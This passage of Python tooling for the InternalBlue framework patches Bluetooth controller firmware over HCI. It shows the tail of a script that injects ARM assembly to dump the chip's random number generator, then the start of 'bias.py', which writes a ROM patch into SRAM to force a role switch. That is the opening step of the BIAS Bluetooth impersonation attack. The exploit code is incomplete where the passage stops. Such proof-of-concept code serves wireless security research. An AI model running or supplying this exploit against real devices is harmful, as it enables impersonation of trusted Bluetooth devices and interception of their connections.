add r0, 2 // buffer starts at 2 with data (?)
ldr r1, =0x444e4152 // RAND
str r1, [r0]
add r0, 4 // advance buffer by 4
// send hci event
mov r0, r4 // back to buffer at offset 0
pop {r0-r4, lr}
b 0x268E // send_hci_event_without_free()
""" % (MEM_ROUNDS, MEM_RNG)
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
1] # just use the first device
# setup sockets
if not internalblue.connect():
internalblue.logger.critical("No connection to target device.")
exit(-1)
internalblue.logger.info("installing assembly patches...")
# Install the RNG code in RAM
code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG)
if not internalblue.writeMem(
address=ASM_LOCATION_RNG, data=code, progress_log=None):
internalblue.logger.critical("error!")
exit(-1)
# bias.py
"""
Use it with internalblue
"""
#!/usr/bin/python2
from pwn import *
from internalblue.hcicore import HCICore
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1]
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("BEGIN patchrom.")
# patch1: make sure we always switch to master role
code1 = b"""
@Part 1: Make sure we always switch roles
mov r6, #0x0
sub sp, #0x18
add r0, #0xc
b 0x2e7ad
"""
addrcode1 = 0x2006d0
taddrcode1 = addrcode1 + 1 # 0x2006d1
# write code1 into addrcode1 (SRAM)